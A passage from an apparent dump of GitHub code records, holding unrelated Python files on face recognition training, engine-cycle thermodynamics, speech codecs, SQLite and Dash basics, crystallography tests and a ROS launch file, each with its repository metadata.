ValueError\n\n\n def _get_checkpoint(self):\n \"\"\"\n get the best_checkpoint of the last training, use for resume and continue the training.\n \"\"\"\n PATH = \"{}/{}/{}\".format(self.config.basic.result_dir, self.config.basic.checkpoint, \"best_checkpoint.pth\" )\n old_checkpoint = torch.load(PATH)\n\n # if the model was trained by nn.DataParallel, need to remove \"module.\" from the keys\n new_state_dict = OrderedDict()\n for i, key in enumerate(old_checkpoint['state_dict']):\n name = key.replace(\"module.\", \"\")\n new_state_dict[name] = old_checkpoint['state_dict'][key]\n\n return old_checkpoint, new_state_dict\n \n\n\n\n def _create_model(self):\n\n if self.config.model.name == \"resnet51\":\n model = resnet51(pretrained=self.config.model.pretrained, progress=False, feature_size=self.config.model.feature_size,\n num_classes=self.config.model.num_classes)\n\n elif self.config.model.name == \"arcface\":\n model = ArcFace(pretrained=self.config.model.pretrained, feature_size=self.config.model.feature_size,\n num_classes=self.config.model.num_classes)\n else:\n raise ValueError\n \n if self.config.training.resume:\n # get the best model from the checkpoint of a previous training\n model.load_state_dict(self.state_dict)\n\n return model\n\n\n","repo_name":"NeutrinoWY/improve_face_recognition_with_image_perturbations","sub_path":"model_training/training/model_manager.py","file_name":"model_manager.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"30007619647","text":"class Node:\n def __init__(self, val):\n self.val = val\n self.next = None\n\nn = int(input())\nnums1 = list(map(int, input().split(' ')))\nhead1 = None\nfor i in range(n):\n if not head1:\n head1 = Node(nums1[i])\n cursor1 = head1\n else:\n cursor1.next = Node(nums1[i])\n cursor1 = cursor1.next\nm = int(input())\nnums2 = list(map(int, input().split(' ')))\nhead2 = None\nfor i in range(m):\n if not head2:\n head2 = Node(nums2[i])\n cursor2 = head2\n else:\n cursor2.next = Node(nums2[i])\n cursor2 = cursor2.next\n\ncursor1 = head1\ncursor2 = head2\nres = []\nwhile cursor1 and cursor2:\n if cursor1.val == cursor2.val:\n res.append(cursor1.val)\n cursor1 = cursor1.next\n cursor2 = cursor2.next\n elif 
cursor1.val>cursor2.val:\n cursor1 = cursor1.next\n else:\n cursor2 = cursor2.next\nfor i in range(len(res)):\n print(res[i], end=' ')\n\n\n \n\n ","repo_name":"yanglinkevin/pythonAutumnExam","sub_path":"pyCode/tencent1.py","file_name":"tencent1.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"73781994548","text":"from telisar.languages.base import BaseLanguage\nimport re\n\n\nclass Celestial(BaseLanguage):\n\n vowels = ['a', 'e', 'i', 'o', 'u', 'î', 'ê', 'â', 'û', 'ô', 'ä', 'ö', 'ü', 'äu', 'ȧ', 'ė', 'ị', 'ȯ', 'u̇']\n\n consonants = ['b', 'sc', 'f', 'h', 'l', 'm', 'n', 'r', 's', 'v']\n\n syllable_template = ('V', 'v', 'c', 'c', 'v', 'v')\n\n _invalid_sequences = re.compile(\n r'[' + ''.join(vowels) + ']{5}|' +\n r'[' + ''.join(consonants) + ']{3}'\n )\n\n syllable_weights = [3, 2]\n\n minimum_length = 5\n\n def validate_sequence(self, sequence, total_syllables):\n too_short = len(''.join(sequence)) < self.minimum_length\n if too_short:\n return False\n\n t = ''.join(sequence)\n\n if self._invalid_sequences.match(t):\n self._logger.debug(f\"Invalid sequence: {t}\")\n return False\n return True\n","repo_name":"evilchili/telisar","sub_path":"telisar/languages/celestial.py","file_name":"celestial.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"32483460677","text":"import random\n\nimport numpy as np\n\n# from keras.layers import Dense, Dropout\n# from keras.models import Sequential\n\n\ndef random_gen(size, max_value):\n gen = []\n for _ in range(size):\n rand_gen = round(random.uniform(0, max_value - 1))\n try:\n gen.index(rand_gen)\n except ValueError:\n gen.append(rand_gen)\n\n return gen\n\n\ndef merge_liner(size, weights_1, weights_2, mutation):\n replace = round(size / 2)\n gen = random_gen(replace, size)\n result = np.zeros(size, dtype='float32')\n\n for itr in gen:\n result[itr] = weights_1[itr]\n\n for itr, _ in np.ndenumerate(weights_2):\n itr = itr[0]\n if itr not in gen:\n result[itr] = weights_2[itr]\n\n if mutation:\n replace = round(size * 0.2)\n gen = random_gen(replace, size)\n for itr in gen:\n result[itr] = random.uniform(-1, 1)\n\n return result\n\n\ndef merge(weights_1, weights_2, mutation=True):\n '''\n merge xx algorithm\n Merge half\n Mutation default 20%\n\n # param\n weights_1 = [[ [weight], [weight], [weight] ], [offsets]]\n '''\n if len(weights_1[0]) != len(weights_2[0]):\n raise Exception()\n\n if len(weights_1[0][0]) != len(weights_2[0][0]):\n raise Exception()\n\n if len(weights_1[1]) != len(weights_2[1]):\n raise Exception()\n\n depth_weights = len(weights_1[0])\n size_weights = len(weights_1[0][0])\n\n result = [np.zeros((depth_weights, size_weights), dtype='float32'), np.zeros(\n size_weights, dtype='float32')]\n\n for depth in range(depth_weights):\n result[0][depth] = merge_liner(\n size_weights, weights_1[0][depth], weights_2[0][depth], mutation)\n\n return result\n\n# model = Sequential()\n\n# input = Dense(18, input_shape=(6,), activation=\"relu\")\n# hidden_1 = Dense(32, activation=\"softmax\")\n# hidden_2 = Dense(32, activation=\"softmax\")\n# output = Dense(4, activation=\"linear\")\n\n# model.add(input)\n# model.add(hidden_1)\n# model.add(Dropout(0.35))\n# model.add(hidden_2)\n# model.add(Dropout(0.35))\n# model.add(output)\n\n# print(input.get_weights())\n\n\nW__1 = [np.random.randn(6, 18), np.zeros(18)]\nW__2 = [np.random.randn(6, 18), 
np.zeros(18)]\n\nWW = merge(W__1, W__2)\nprint(WW)\n\n# w1 = np.asarray([], dtype='float32')\n","repo_name":"farwydi/dex-nn","sub_path":"python/experiment/move/marge_test.py","file_name":"marge_test.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"29377430577","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom winGasProp import GasProp\nfrom stages import *\n\n\nif __name__ == '__main__':\n\n # Stage a\n Ta = 288.16 # K\n pa = 101325 # Pa\n ha, sa = stagea(Ta, pa)\n\n # Stage 0a\n T0a = Ta\n p0a = pa\n h0a, s0a = ha, sa\n\n\n # Stage 01\n specs = pd.read_csv('BasicSpecs.csv')\n eff_diffuser = specs['eff_diffuser'][0]\n T01 = T0a # K\n p01 = p0a*eff_diffuser # Pa\n h01, s01 = stage01(T01, p01)\n\n # Stage 02i\n pi_0c = specs['Compressor Ratio'].values[0]\n h02i, w_ci, p02i, s02i = stage02i(pi_0c, p01, s01, h01)\n\n # Stage 02\n eff_c = specs['eff_compressor'].values[0]\n s02, w_c, h02, p02 = stage02(p02i, w_ci, h01, eff_c)\n print('Compressor Work:', w_c)\n\n # Stage 03\n comb_pLoss = specs['pres_drop_combustor'].values[0]\n eff_comb = 1\n TIT = specs['TIT [K]'].values[0]\n p03 = p02i * (1- comb_pLoss)\n h03, s03, excess_air, r, q = stage03(TIT, h02, eff_comb, p03)\n\n # Stage 04i\n s04i = s03\n eff_turbine = specs['eff_turbine'].values[0]\n h04i, w_t, T04i, p04i = stage04i(h03, w_c, excess_air, eff_turbine, r, q, s04i)\n\n\n # Stage 04\n p04 = p04i\n s04, T04, h04 = stage04(p04, w_t, h03, r, q)\n print('T_04:', T04)\n\n # Stage 04.5i\n s045i = s04\n SHP = specs['Shaft horse power [kW]'].values[0]\n eff_free_turbine = specs['eff_free_turbine'].values[0]\n m_air = 1.64089 #1.365303689 # kg/s\n w_PT, T045i, h045i, p045i, m_g, m_fuel = stage045i(SHP, m_air, excess_air, eff_free_turbine, h04, r, q, s045i)\n\n # Stage 045\n p045 = p045i\n h045, s045, T045 = stage045(p045, w_PT, h04, r, q)\n\n # Stage 5i\n s5i = s045\n p5i = p01/1e5\n # p5i = 1.128 # calculated the critical pressure\n eff_nozzle = specs['eff_nozzle'].values[0]\n eff_propeller = specs['eff_propeller'].values[0]\n T5i, h5i, c5, Spec_Thrust, EBSFC = stage5i(r, q, s5i, p5i, h045, eff_nozzle, m_air,\n excess_air, eff_propeller, SHP, m_fuel)\n\n # Stage 5\n p5 = p5i\n h5 = h5i\n s5 = s5i\n T5 = T5i\n\n\n # Make a Table of the results for each stage\n stages = ['a', '0a', '01', '02i', '02', '03', '04i', '04', '045i', '045', '5i', '5']\n p = [pa/1e5, p0a/1e5, p01/1e5, p02i, p02, p03, p04i, p04, p045i, p045, p5i, p5]\n h = [ha, h0a, h01, h02i, h02, h03, h04i, h04, h045i, h045, h5i, h5]\n s = [sa, s0a, s01, s02i, s02, s03, s04i, s04, s045i, s045, s5i, s5]\n\n print('m_air = ', m_air, 'kg/s')\n print('m_fuel = ', m_fuel, 'kg/s')\n print('TIT = ', TIT, 'K')\n\n df = pd.DataFrame({'Stage': stages, 'Pressure [bar]': p, 'Enthalpy [kJ/kg]': h, 'Entropy [kJ/kg-K]': s})\n print(df)\n\n# df to csv\n df.to_csv('results.csv')\n\n df2 = pd.DataFrame({'w_c': w_c, 'w_t': w_t, 'w_PT': w_PT, 'SHP': SHP, 'm_air': m_air, 'm_fuel': m_fuel, 'Spec_Thrust': Spec_Thrust, 'EBSFC': EBSFC, 'TIT': TIT, 'lambda': excess_air}, index=[0])\n df2.to_csv('results2.csv')\n \n\n\n\n\n\n\n\n","repo_name":"Carmeisel101/RealEngineCycle_TurboProp","sub_path":"task1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"26469365722","text":"import sqlite3\r\n\r\nconn = sqlite3.connect('practise.db')\r\n\r\n# 
Create a cursor\r\nc = conn.cursor()\r\n\r\n# Create a table\r\nc.execute(\"\"\"\r\n \tcreate table employees ( \r\n\tfirstName text,\r\n\tlastName text,\r\n\temail text,\r\n\tsalary integer\r\n\t)\r\n\t\"\"\")\r\nemployee_detail = [ ('Test1', 'Tes', 'test1@gmail.com', 7000),\r\n\t\t\t\t\t('Test2', 'Tes2', 'test2@gmail.com', 15000),\r\n\t\t\t\t\t('Test3', 'Tes3', 'test3@gmail.com', 25000),\r\n ]\r\nc.executemany(\"insert into employees values (?, ?, ?, ?)\", employee_detail)\r\n\r\nc.execute(\"\"\"\r\n\tselect * from employees\r\n\t\"\"\")\r\n# print(c.fetchone())\r\n# print(c.fetchmany(3))\r\n# print(c.fetchall())\r\nfor row in c.fetchall():\r\n\tprint(row)\r\n\r\nconn.commit()\r\n\r\n# close the connection\r\n\r\nconn.close()\r\n","repo_name":"shriram-s6/My-Learnings-and-Project-Work","sub_path":"Sqlite/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71517747189","text":"import dash\r\nimport dash_html_components as html\r\n\r\napp = dash.Dash()\r\n\r\napp.layout= html.Div(['parent Division',\r\n html.Div(['This is inner division'],style={'color':'brown','backgroundColor':'black'}),\r\n html.Div(['Another inner division'],style={'backgroundColor':'red','color':'white','border':'3px black solide'})],\r\nstyle={'color':'green','textAlign':'center','border':'2px red solid'})\r\n\r\n# if __name__=='__main__':\r\n# app.run_server(debug=True)\r\n","repo_name":"hassandosso/Ploty-Dashboard-Course","sub_path":"Interactive Python Dashboard with plotly dash/data-basic/Dash-basic-layout/html_component.py","file_name":"html_component.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"70721564469","text":"import os\nimport disspcap\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\npackets = []\n\n\ndef setup_module():\n pcap = disspcap.Pcap(f'{dir_path}/pcaps/fault_data.pcap')\n packet = pcap.next_packet()\n\n while packet:\n packets.append(packet)\n packet = pcap.next_packet()\n\n\ndef test_binary_data_starting_with_GET():\n assert packets[0].http.request_method == ''\n","repo_name":"danieluhricek/disspcap","sub_path":"tests/test_fault_binary.py","file_name":"test_fault_binary.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"94"} +{"seq_id":"42738106565","text":"\nimport pyfirmata\nfrom time import sleep\nfrom pyfirmata.util import Iterator\nboard= pyfirmata.Arduino('COM3')\n\n\nldr=board.get_pin('a:0:i')\nled=board.get_pin('d:11:p')\n\nwhile True:\n value=ldr.read()\n print(value)\n led.write(value)\n sleep(1)\n\n\n","repo_name":"Kashfi-uddin/Arduino-python","sub_path":"ldr/ldr.py","file_name":"ldr.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"885924355","text":"from lxml import etree\nimport logging\nimport click\nimport jinja2\nfrom pathlib import Path\nimport subprocess\nimport shutil\n\n#------------------------------------------------------------------------------\n\n\n@click.group()\ndef cli():\n pass\n\n#------------------------------------------------------------------------------\n\ndoxy_template = jinja2.Template(\"\"\"\n\nGENERATE_LATEX = NO\nGENERATE_HTML = NO\nGENERATE_XML = YES\nOUTPUT_DIRECTORY = {{output_dir}}\nINPUT= \\\\\n{% for f in 
files -%}\n {{f}} \\\\\n{% endfor %}\n\"\"\")\n\nc_template = jinja2.Template(\"\"\"\n#include \n#include \"unittest.h\"\n\n/* test functions declarations */\n{% for i in functions -%}\nchar* {{i}}(void);\n{% endfor %}\n\nint test_run = 0;\n\n/* execute all tests */\nstatic char * all_tests() {\n char* msg;\n{% for i in functions %}\n printf(\"starting test {{i}}\\\\n\");\n test_run++;\n msg = {{i}}();\n if(msg) {\n printf(\"finished test {{i}} FAILED\\\\n\");\n return msg;\n }\n else{\n printf(\"finished test {{i}} SUCCEDED\\\\n\");\n }\n{% endfor %}\n return 0;\n}\n\n/* main */\nint main(int argc, char **argv) {\n char *result = all_tests();\n if (result != 0) {\n printf(\"%s\\\\n\", result);\n }\n else {\n printf(\"ALL TESTS PASSED\\\\n\");\n }\n return result != 0;\n printf(\"Tests run: %d\\\\n\", test_run);\n}\n\"\"\")\n\n#------------------------------------------------------------------------------\n\n\n@cli.command()\n@click.option('--output-file', '-o', required=True)\n@click.option('--doxygen-dir', type=Path, required=True)\n@click.argument('files', nargs=-1)\ndef generate(output_file, doxygen_dir, files):\n logging.info(\"files: %s, output_file: %s\", files, output_file)\n run_doxygen(doxygen_dir, files)\n functions = get_functions(doxygen_dir / 'xml' / 'index.xml')\n logging.info(\"Functions: %s\", functions)\n with open(output_file, 'w') as f:\n f.write(c_template.render(functions=functions))\n\n#------------------------------------------------------------------------------\n\n\ndef run_doxygen(doxygen_dir, input_files):\n doxyfile = doxygen_dir / 'doxyfile'\n doxygen_dir.mkdir(exist_ok=True)\n create_doxyfile(doxyfile, doxygen_dir, input_files)\n try:\n shutil.rmtree(str(doxygen_dir / \"xml\"))\n except FileNotFoundError:\n pass\n print(\"*\" * 90)\n print(['doxygen', str(doxyfile)])\n print(\"*\" * 90)\n subprocess.check_call(['doxygen', str(doxyfile)])\n\n#------------------------------------------------------------------------------\n\n\ndef create_doxyfile(doxyfile, doxygen_dir, input_files):\n with doxyfile.open('w') as f:\n f.write(doxy_template.render(files=input_files,\n output_dir=doxygen_dir))\n\n#------------------------------------------------------------------------------\n\n\ndef get_functions(xml):\n with xml.open() as f:\n root = etree.parse(f)\n return [i.find('name').text for i in root.iterfind('.//member')\n if i.get('kind') == 'function'\n if i.find('name').text.startswith(\"test\")]\n\n\n#------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n cli()\n","repo_name":"mariku/ringen","sub_path":"create_test_runner.py","file_name":"create_test_runner.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"18427064788","text":"import re\r\n\r\ndoc = open(\"C:\\\\Users\\\\bbarker\\\\Desktop\\\\prices.txt\", \"r\").read()\r\ndocArray = doc.split('},')\r\ncurrCountries = {\"USD\":'\"',\"GBP\":'\"',\"EUR\":'\"'}\r\n\r\nfor i in range(len(docArray)):\r\n country = re.search(r'(?<=\"CountryCode\": \")\\w+', docArray[i])\r\n currency = re.search(r'(?<=\"Currency\": \")\\w+', docArray[i])\r\n current = currCountries[str(currency[0])]\r\n if str(country[0]) not in current:\r\n currCountries[currency[0]] += country[0] + ' '\r\n\r\nfor kind in currCountries:\r\n currCountries[kind] = currCountries[kind].strip().replace(\" \", '\", \"') + '\"'\r\n print(kind + ': ' + 
currCountries[kind])\r\n","repo_name":"nulleleven/stuff","sub_path":"Countries(currencies).py","file_name":"Countries(currencies).py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"39509988076","text":"#loops\nfruits = [\"apple\", \"peach\", \"pear\"]\n\nfor fruit in fruits:\n print(fruit)\n\n#exercise\nstudents_height = [180, 124, 165, 173, 189, 169, 146]\ntotal_height = 0\n\nfor height in students_height:\n total_height += height\n\naverage_height = round(total_height / len(students_height))\nprint(average_height)\n\n#exercise\nscores = input(\"Enter students scores: \").split(\",\")\nhighest = 0\n\n\nfor score in scores:\n if int(score) > highest:\n highest = int(score)\n\nprint(f\"the highest score is {highest}\")\n\n#range function\nfor i in range(1, 11, 2):\n print(i)\n\nsum = 0\nfor number in range(1, 101):\n sum += number\n\nprint(sum)\n\n#exercise\ntotal = 0\nfor i in range(2, 101, 2):\n total += i\n print(total)\n\n#exercise\nfor i in range(1, 101):\n if (i % 3 == 0) and (i % 5 == 0):\n print(\"fizzbuzz\")\n elif i % 3 == 0:\n print(\"fiz\")\n elif i % 5 == 0:\n print(\"buzz\")\n else:\n print(i)\n\n\n\n\n\n\n\n\n","repo_name":"dkerobean/100-Days-Of-Coding-Python","sub_path":"Day 5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"8298528709","text":"import os\nimport numpy as np\n\ndef channel(signal, codec, Fs, rate = 0):\n\n\tsignal = np.append(signal, np.zeros(160))\n\tsignal.astype('int16').tofile(\"temp/signal_sent.raw\")\n\n\tif codec == \"AMR\" and Fs == 8000:\n\t\tos.system(\"codecs/encoder_2018 MR122 temp/signal_sent.raw temp/AMR-enc.out\")\n\t\tos.system(\"codecs/decoder_2018 temp/AMR-enc.out temp/signal_received.raw\")\n\t\tsignal_rec = np.fromfile(\"temp/signal_received.raw\", dtype = 'int16')\n\t\tsignal_rec = signal_rec[40:]\n\telif codec == \"SPEEX\" and Fs == 8000:\n\t\tos.system(\"speexenc --bitrate \" + str(rate) + \" temp/signal_sent.raw temp/SPEEX-enc.out\")\n\t\tos.system(\"speexdec temp/SPEEX-enc.out temp/signal_received.raw\")\n\t\tsignal_rec = np.fromfile(\"temp/signal_received.raw\", dtype = 'int16')\n\telif codec == \"SILK\" and (Fs == 8000 or Fs == 16000):\n\t\tos.system(\"codecs/opus_demo -e voip \" + str(Fs) + \" 1 \" + str(rate) + \" -cbr temp/signal_sent.raw temp/OPUS_SILK-enc.out\")\n\t\tos.system(\"codecs/opus_demo -d \" + str(Fs) + \" 1 temp/OPUS_SILK-enc.out temp/signal_received.raw\")\n\t\tsignal_rec = np.fromfile(\"temp/signal_received.raw\", dtype = 'int16')\n\t\tif Fs == 8000:\n\t\t\tsignal_rec = signal_rec[53:]\n\t\telse:\n\t\t\tsignal_rec = signal_rec[104:]\n\telif codec == \"CELT\" and (Fs == 8000 or Fs == 16000):\n\t\tos.system(\"codecs/opus_demo -e audio \" + str(Fs) + \" 1 \" + str(rate) + \" -cbr temp/signal_sent.raw temp/OPUS_CELT-enc.out\")\n\t\tos.system(\"codecs/opus_demo -d \" + str(Fs) + \" 1 temp/OPUS_CELT-enc.out temp/signal_received.raw\")\n\t\tsignal_rec = np.fromfile(\"temp/signal_received.raw\", dtype = 'int16')\n\t\tif Fs == 8000:\n\t\t\tsignal_rec = signal_rec[53:]\n\t\telse:\n\t\t\tsignal_rec = signal_rec[104:]\n\telse:\n\t\tprint(\"Bad channel parameters\")\n\t\tsignal_rec = [1]\n\t\n\treturn 
signal_rec.astype('float')\n","repo_name":"PiotrKrasnowski/Speech_Encryption","sub_path":"channel.py","file_name":"channel.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"18535385708","text":"from itertools import combinations\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\nimport pprint\n\n\ndef classify_sentiment(n_del, p_del, sent_score):\n \"\"\"Function that classifies a sentiment score into one of three categories: 0 (negative), 1 (neutral),\n 2 (positive) \"\"\"\n if sent_score < n_del:\n return 0\n elif sent_score > p_del:\n return 2\n else:\n return 1\n\n\ndef get_error(data, column):\n improvements_err = (data[\"improvements_sentiment\"] != data[column])\n return improvements_err.sum() / df.shape[0]\n\n\ndef get_best_delimiters(data, lang, app):\n column = f\"improvements_{lang}_{app}\"\n # All possible combinations for delimiters\n digits = np.arange(data[f\"{column}_gscore\"].min(), data[f\"{column}_gscore\"].max(), .01)\n delimiters = list(combinations(digits, 2))\n\n max_val = 0\n best_delimiter = delimiters[0]\n\n for delimiter in tqdm(delimiters):\n data[f\"{column}_sentiment\"] = data[f\"{column}_gscore\"].apply(lambda x: classify_sentiment(*delimiter, x))\n error = get_error(data, f\"{column}_sentiment\")\n if error > max_val:\n max_val = error\n best_delimiter = delimiter\n return best_delimiter, max_val\n\n\nif __name__ == \"__main__\":\n df = pd.read_csv(\"datasets/dataset_oficial.csv\", usecols=[\"Sentimiento 2\"])\n df.columns = [\"improvements_sentiment\"]\n\n for app in [\"complete\", \"noun_adj\", \"adj\"]:\n for lang in [\"es\", \"en\"]:\n x_df = pd.read_csv(f\"datasets/gcloud_output_{lang}_{app}_val.csv\")\n x_df[f\"improvements_{lang}_{app}_gscore\"] = x_df[f\"improvements_{lang}_{app}_gscore\"] * \\\n (x_df[f\"improvements_{lang}_{app}_gmagnitude\"] + 1)\n y_df = pd.read_csv(f\"datasets/gcloud_output_{lang}_{app}_prod.csv\")\n y_df[f\"improvements_{lang}_{app}_gscore\"] = y_df[f\"improvements_{lang}_{app}_gscore\"] * \\\n (y_df[f\"improvements_{lang}_{app}_gmagnitude\"] + 1)\n z_df = pd.concat([x_df, y_df])\n z_df = z_df.set_index(\"index\")\n\n df = df.merge(z_df[f\"improvements_{lang}_{app}_gscore\"], left_index=True, right_index=True)\n df.to_csv(\"datasets/complete_gscores.csv\")\n\n results = dict()\n for app in [\"complete\", \"noun_adj\", \"adj\"]:\n for lang in [\"es\", \"en\"]:\n best_threshold, max_acc = get_best_delimiters(df, lang, app)\n results[f\"improvements_{lang}_{app}\"] = {}\n results[f\"improvements_{lang}_{app}\"][\"best_threshold\"] = best_threshold\n results[f\"improvements_{lang}_{app}\"][\"max_accuracy\"] = max_acc\n\n app = \"complete\"\n lang = \"en\"\n #column = f\"improvements_{lang}_{app}\"\n #df[f\"{column}_sentiment\"] = df[f\"{column}_gscore\"].apply(lambda x: classify_sentiment(-0.05266, 0.979148, x))\n #error = get_error(df, f\"{column}_sentiment\")\n\n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(results)","repo_name":"omar-bracamontes-zavala/Sermone","sub_path":"data_merge.py","file_name":"data_merge.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"36073577636","text":"# LKS1Mb-Sender-2.py\r\n# Besked fra input sendt kontinuerligt (løbende) med \r\n# på default kanal med default sendestyrke med 500msec interval\r\nfrom microbit import *\r\nimport radio\r\n\r\nradio.on()\r\nbesked = 
input(\"Indtast det som skal sendes: \") # Venter på input fra shell\r\n \r\nwhile True:\r\n radio.send(besked)\r\n sleep(500) # Er vigtig nu da program IKKE venter på input hver gang det kommer rundt\r\n # Bemærk forskel i modtager ift. sender-1.","repo_name":"TPSoundhub/LYDKit2022","sub_path":"SPOR 1/LKS1/Mb/LKS1Mb-Sender-2.py","file_name":"LKS1Mb-Sender-2.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"da","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"9432853421","text":"from django.shortcuts import render, redirect\nfrom .models import Notice\n\n\n# Read : 전체 게시글 조회\ndef index(request):\n notices = Notice.objects.all()[::-1]\n context = {\n 'notices' : notices\n }\n return render(request, 'notices/index.html', context) # 전체 게시글 목록을 반환\n\n# Create : 게시글 생성\ndef new(request):\n return render(request, 'notices/new.html')\n\ndef create(request):\n title = request.POST.get('title')\n content = request.POST.get('content')\n notice = Notice(title=title, content=content) # 입력받은 값을 Notice에 저장\n notice.save() # DB에 저장\n \n # 새 url로 요청 전송\n return redirect('notices:detail', notice.pk)\n\n# Read : 개별 게시글 조회\ndef detail(request, pk):\n notice = Notice.objects.get(pk=pk)\n context = {\n 'notice' : notice,\n }\n \n return render(request, 'notices/detail.html', context)\n\n# Delete : 게시글 삭제\ndef delete(request, pk):\n notice = Notice.objects.get(pk=pk)\n # POST일 경우에만 삭제 : 보안 문제\n if request.method == 'POST':\n notice.delete()\n return redirect('notices:index')\n # POST가 아닐 경우, 삭제 버튼이 있는 detail 페이지로 redirect\n else:\n return redirect('notices:detail', notice.pk)\n\n# Update : 게시글 수정\ndef edit(request, pk):\n notice = Notice.objects.get(pk=pk)\n context = {\n 'notice' : notice,\n }\n return render(request, 'notices/edit.html', context)\n\ndef update(request, pk):\n notice = Notice.objects.get(pk=pk)\n notice.title = request.POST.get('title')\n notice.content = request.POST.get('content')\n notice.save()\n return redirect('notices:detail', notice.pk)","repo_name":"lhynjn9/Django_CRUD","sub_path":"01_Basic_CRUD/notices/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"10372634507","text":"\"\"\"\nTest command line program dials.two_theta_refine by running a job with saved\ndata and comparing with expected output.\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\nimport procrunner\nimport pytest\n\nfrom dxtbx.model.experiment_list import ExperimentListFactory\n\n\ndef test(dials_data, tmpdir):\n \"\"\"Test two theta refine on integrated data.\"\"\"\n # use multiple scan small molecule data for this test\n data_dir = dials_data(\"l_cysteine_dials_output\")\n prefix = (20, 25, 30, 35)\n exp_path = [data_dir / (\"%d_integrated_experiments.json\" % p) for p in prefix]\n pkl_path = [data_dir / (\"%d_integrated.pickle\" % p) for p in prefix]\n\n for pth in exp_path + pkl_path:\n assert pth.check(), \"%s missing\" % pth.strpath\n\n cmd = (\n [\n \"dials.two_theta_refine\",\n \"cif=refined_cell.cif\",\n \"output.correlation_plot.filename=corrplot.png\",\n ]\n + exp_path\n + pkl_path\n )\n\n print(cmd)\n\n # work in a temporary directory\n result = procrunner.run(cmd, working_directory=tmpdir)\n assert not result.returncode and not result.stderr\n assert tmpdir.join(\"refined_cell.expt\").check()\n ref_exp = ExperimentListFactory.from_json_file(\n tmpdir.join(\"refined_cell.expt\").strpath, 
check_format=False\n )\n\n xls = ref_exp.crystals()\n assert len(xls) == 4\n for xl in xls:\n assert xl.get_unit_cell() != xl.get_recalculated_unit_cell()\n # test refined crystal model against expected values\n assert xl.get_recalculated_unit_cell().parameters() == pytest.approx(\n (5.428022880, 8.144145476, 12.039666971, 90.0, 90.0, 90.0), 1e-4\n )\n assert xl.get_recalculated_cell_parameter_sd() == pytest.approx(\n (9.58081e-5, 0.000149909, 0.000215765, 0, 0, 0), 1e-4\n )\n assert xl.get_recalculated_cell_volume_sd() == pytest.approx(0.0116254298, 1e-4)\n\n\ndef test_two_theta_refine_scaled_data(dials_data, tmpdir):\n \"\"\"Test two theta refine on scaled data.\"\"\"\n location = dials_data(\"l_cysteine_4_sweeps_scaled\")\n refls = location.join(\"scaled_20_25.refl\")\n expts = location.join(\"scaled_20_25.expt\")\n\n command = [\n \"dials.two_theta_refine\",\n refls,\n expts,\n \"output.experiments=refined_cell.expt\",\n \"partiality_threshold=0.99\",\n ]\n result = procrunner.run(command, working_directory=tmpdir)\n assert not result.returncode and not result.stderr\n assert tmpdir.join(\"refined_cell.expt\").check()\n\n ref_exp = ExperimentListFactory.from_json_file(\n tmpdir.join(\"refined_cell.expt\").strpath, check_format=False\n )\n\n assert len(ref_exp.crystals()) == 2\n for xl in ref_exp.crystals():\n # test refined crystal model against expected values\n assert xl.get_recalculated_unit_cell().parameters() == pytest.approx(\n (5.426921, 8.146654, 12.037366, 90.0, 90.0, 90.0), 1e-4\n )\n assert xl.get_recalculated_cell_parameter_sd() == pytest.approx(\n (2.0123e-04, 2.8039e-04, 4.5284e-04, 0, 0, 0), 1e-4\n )\n assert xl.get_recalculated_cell_volume_sd() == pytest.approx(0.0237364, 1e-4)\n","repo_name":"TiankunZhou/dials","sub_path":"test/command_line/test_two_theta_refine.py","file_name":"test_two_theta_refine.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"94"} +{"seq_id":"4971310826","text":"# This is a fan-out example of: 1 SOURCE --> 3 WORK --> 3 SINK nodes.\nfrom launch import LaunchDescription\nfrom launch_ros.actions import Node\nimport os\n\n# Set test values here (will need to get cmdLine values or somesuch)\ntest_duration = '60' # duration of test run, in seconds\npub_frequency = '10' # pubs per second from 